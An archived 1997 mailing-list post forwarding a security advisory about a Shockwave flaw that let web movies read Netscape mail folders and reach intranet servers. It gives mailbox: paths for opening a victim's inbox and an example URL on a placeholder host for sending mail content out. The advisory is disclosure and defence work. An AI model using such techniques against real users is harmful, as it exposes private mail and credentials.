Interesting People mailing list archives

Previous By Date Next
Previous By Thread Next

IP: Shockware + Netscape Navigator: Shockwave Security

From: Dave Farber <farber () cis upenn edu>
Date: Fri, 14 Mar 1997 17:01:48 -0500
This seems real and the url exists so I believe it is real . Cautious Dave




____________________________________________________________________________
___
Subject: SECURITY: Shockware + Netscape Navigator: Shockwave Security
From:    Scott Lystig Fritchie <fritchie () MR Net> at Internet
Date:    3/14/97  2:19 PM




Subject: BoS:       Shockwave Security Alert


http://www.webcomics.com/shockwave/




                           SHOCKWAVE SECURITY ALERT






   AKA :: How to use Shockwave to read people's Netscape email!


   10-Mar-97 --- reported by: David de Vitry


   What is this about?




       This is about a security hole in Shockwave that allows malicious
       webpage developers to create a Shockwave movie that will read
       through a user's emails, and potentially upload them to a server.
       All without the user knowing about it. In addition, there is a
       risk to internal Web servers behind corporate firewalls,
       regardless of the browser you use (Netscape or Internet Explorer),
       as long as you have the current release of Shockwave.




   Who could be affected?




       Users of Netscape 3.0 (and 2.0?) on Win 95 / NT/ Mac with
       Shockwave installed.  In addition, the user must not have upgraded
       to "Communicator", (this just changes the directory structure) and
       must use the Netscape browser to read their email. There may be
       other browsers / platfroms affected by similar insecurities with
       Shockwave






   How is this done?




       A developer can use Shockwave to access the user's Netscape email
       folders. This is done assuming the name and path to the mailbox on
       the users hard drive. For example names such as: Inbox, Outbox,
       Sent and Trash are all default names for mail folders. The default
       path to the "Inbox" on Win 95/NT would be: "C:/Program
       Files/Netscape/Navigator/Mail/Inbox". Then the developer can use
       the Shockwave command "GETNETTEXT" to call Navigator to query the
       email folder for an email message. The results of this call can
       then be feed into a variable, and later processed and sent to a
       server. To access a message, for example, the first message in a
       users Inbox, would be called using the following location:


       For Windows: mailbox:C:/Program
       Files/Netscape/Navigator/Mail/Inbox?number=0


       For MacOS (thanks Jeremy Traub)
       mailbox:/Macintosh%20HD/System%20Folder/Preferences/Netscape%20%C
       4/Mail/Inbox?number=0


       Note: if these links all give you an error (such as folder no
       longer exists), then you might not have anything to worry about.
       However, if you see an email message in a pop up window, and you
       have Shockwave installed, then you are vulnerable to this security
       hole.




   Show Me an example! Here it is, a Shockwave movie that will read your
   email. This will not work for everyone, it is currently only setup to
   work with Win95 / NT, but it could be extended to identify the browser
   (Jeremy Traub).


   Interesting, but what is the security hole?




       It doesn't stop at just the first messages of your inbox.
       A shockwave program could increment through a users entire inbox,
       outbox, sent, and trash email folder. This information could then
       be sent back to a server (using a the GET method with a simple cgi
       program. i.e.
       http://www...com/upload.cgi?data=This_could_be_your_email_content_
       here), all with out the user ever noticing. Here are just a few
       types of information that a malicious developer could obtain using
       this hole:
          + Your name and email
          + Your friends names and emails
          + User id's and passwords sent to you in email, and where and
            how to use them.
          + Personal email messages that you sent or received using
            Netscape






       The "GETNETTEXT" command also has other problems in that it can
       access other http servers, including ones that are not on the
       internet, ie, ones that are behind a corporate firewall. That is
       if the movie is run from behind the firewall. This may be even a
       bigger problem then the email one, however it affects only
       corporate users.




   Help: What can I do to protect myself?




       There are a number of things that you could do to protect yourself
       from malicious shockwave movies:
          + Change the path to your mail folders
          + Don't use Netscape to read or send email
          + DeInstall Shockwave
          + Don't go to potentially hostile sites.






   What are people saying? -- please inform me of any other articles.
     * Wired article
     * Macromedia and Netscape have given me no official statements.
       However, they are both in communication with me regarding this
       issue. Macromedia did say that their newest product "Shockwave 6,"
       currently in pre-release, does fix this problem.
     * Microsoft did not want to talk with me about the issue, even
       though there are risks to their users. They just blew me off
       saying "There are obviously plenty of security bugs to go around."
       Followed by, "Great, we're checking it out now."






The hosting for this page was made possible by WebComics ,
   Interverse and the author David de Vitry


------- End of Forwarded Message
Previous By Date Next
Previous By Thread Next

Current thread: